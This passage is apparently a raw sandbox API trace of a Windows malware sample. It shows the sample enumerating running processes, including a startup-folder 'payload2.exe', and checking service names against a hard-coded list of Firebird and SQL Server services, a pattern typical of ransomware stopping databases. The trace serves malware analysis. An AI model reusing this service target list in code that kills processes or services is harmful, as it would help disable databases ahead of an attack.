th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.859] lstrlenW (lpString="svchost.exe") returned 11 [0033.859] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.859] lstrlenW (lpString="svchost.exe") returned 11 [0033.859] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0033.860] lstrlenW (lpString="audiodg.exe") returned 11 [0033.860] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.860] lstrlenW (lpString="svchost.exe") returned 11 [0033.861] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.861] lstrlenW (lpString="svchost.exe") returned 11 [0033.861] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0033.862] lstrlenW (lpString="dwm.exe") returned 7 [0033.862] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0033.862] lstrlenW (lpString="explorer.exe") returned 12 [0033.862] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0033.863] lstrlenW (lpString="spoolsv.exe") returned 11 [0033.863] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.863] lstrlenW (lpString="taskhost.exe") returned 12 [0033.863] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.864] lstrlenW (lpString="svchost.exe") returned 11 [0033.864] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0033.864] lstrlenW (lpString="taskeng.exe") returned 11 [0033.864] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.865] lstrlenW (lpString="taskhost.exe") returned 12 [0033.865] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0033.866] lstrlenW (lpString="challenging.exe") returned 15 [0033.866] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0033.866] lstrlenW (lpString="pgp prix.exe") returned 12 [0033.867] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0033.867] lstrlenW (lpString="user-reno.exe") returned 13 [0033.867] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0033.868] lstrlenW (lpString="aggregate.exe") returned 13 [0033.868] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0033.869] lstrlenW (lpString="dressed.exe") returned 11 [0033.869] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0033.869] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0033.869] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0033.870] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0033.870] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0033.871] lstrlenW (lpString="developing.exe") returned 14 [0033.871] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0033.871] lstrlenW (lpString="supported.exe") returned 13 [0033.871] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0033.872] lstrlenW (lpString="girlstionselect.exe") returned 19 [0033.872] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0033.873] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0033.873] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0033.874] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0033.874] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0033.874] lstrlenW (lpString="eating.exe") returned 10 [0033.874] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0033.875] lstrlenW (lpString="nh_protected.exe") returned 16 [0033.875] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0033.875] lstrlenW (lpString="vulnerability.exe") returned 17 [0034.484] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0034.485] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0034.485] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0034.485] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0034.485] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0034.486] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0034.486] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0034.486] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0034.487] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0034.487] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0034.487] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.488] lstrlenW (lpString="dllhost.exe") returned 11 [0034.488] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.488] lstrlenW (lpString="dllhost.exe") returned 11 [0034.488] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0034.489] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0034.489] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0034.489] lstrlenW (lpString="cmd.exe") returned 7 [0034.489] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0034.490] CloseHandle (hObject=0x118) returned 1 [0034.490] Sleep (dwMilliseconds=0x1f4) [0035.506] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x67fec8 [0035.506] EnumServicesStatusExW (in: hSCManager=0x67fec8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0035.506] GetLastError () returned 0xea [0035.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x11e4) returned 0x39422b0 [0035.507] EnumServicesStatusExW (in: hSCManager=0x67fec8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39422b0, cbBufSize=0x11e4, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39422b0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0035.507] CloseServiceHandle (hSCObject=0x67fec8) returned 1 [0035.507] lstrlenW (lpString="Appinfo") returned 7 [0035.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0035.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0035.507] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0035.507] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0035.507] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0035.507] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0035.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.508] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0035.508] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0035.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0035.508] lstrlenW (lpString="AudioSrv") returned 8 [0035.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0035.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0035.508] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0035.508] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0035.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0035.508] lstrlenW (lpString="BFE") returned 3 [0035.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0035.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0035.508] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0035.508] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0035.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0035.508] lstrlenW (lpString="CryptSvc") returned 8 [0035.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0035.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0035.508] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0035.508] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0035.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0035.508] lstrlenW (lpString="CscService") returned 10 [0035.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0035.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0035.508] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0035.508] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0035.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0035.508] lstrlenW (lpString="DcomLaunch") returned 10 [0035.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.509] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0035.509] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0035.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0035.509] lstrlenW (lpString="Dhcp") returned 4 [0035.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0035.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0035.509] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0035.509] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0035.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0035.509] lstrlenW (lpString="Dnscache") returned 8 [0035.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0035.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0035.509] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0035.509] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0035.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0035.509] lstrlenW (lpString="DPS") returned 3 [0035.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0035.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0035.509] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0035.509] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0035.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0035.509] lstrlenW (lpString="eventlog") returned 8 [0035.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0035.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0035.509] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0035.509] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0035.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0035.509] lstrlenW (lpString="EventSystem") returned 11 [0035.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0035.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0035.509] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0035.509] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0035.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0035.509] lstrlenW (lpString="gpsvc") returned 5 [0035.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0035.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0035.509] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0035.509] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0035.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0035.510] lstrlenW (lpString="iphlpsvc") returned 8 [0035.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.510] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0035.510] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0035.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0035.510] lstrlenW (lpString="LanmanServer") returned 12 [0035.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0035.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0035.510] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0035.510] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0035.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0035.510] lstrlenW (lpString="LanmanWorkstation") returned 17 [0035.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.510] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0035.510] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0035.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0035.510] lstrlenW (lpString="lmhosts") returned 7 [0035.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0035.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0035.510] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0035.510] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0035.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0035.510] lstrlenW (lpString="MMCSS") returned 5 [0035.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0035.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0035.510] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0035.510] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0035.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0035.510] lstrlenW (lpString="MpsSvc") returned 6 [0035.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0035.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0035.510] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0035.510] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0035.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0035.510] lstrlenW (lpString="Netman") returned 6 [0035.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0035.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0035.511] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0035.511] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0035.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0035.511] lstrlenW (lpString="netprofm") returned 8 [0035.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0035.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0035.511] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0035.511] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0035.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0035.511] lstrlenW (lpString="NlaSvc") returned 6 [0035.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0035.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0035.511] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0035.511] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0035.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0035.511] lstrlenW (lpString="nsi") returned 3 [0035.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0035.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0035.511] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0035.511] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0035.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0035.511] lstrlenW (lpString="PcaSvc") returned 6 [0035.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0035.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0035.511] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0035.511] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0035.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0035.511] lstrlenW (lpString="PlugPlay") returned 8 [0035.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0035.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0035.511] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0035.511] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0035.511] lstrcmpiW 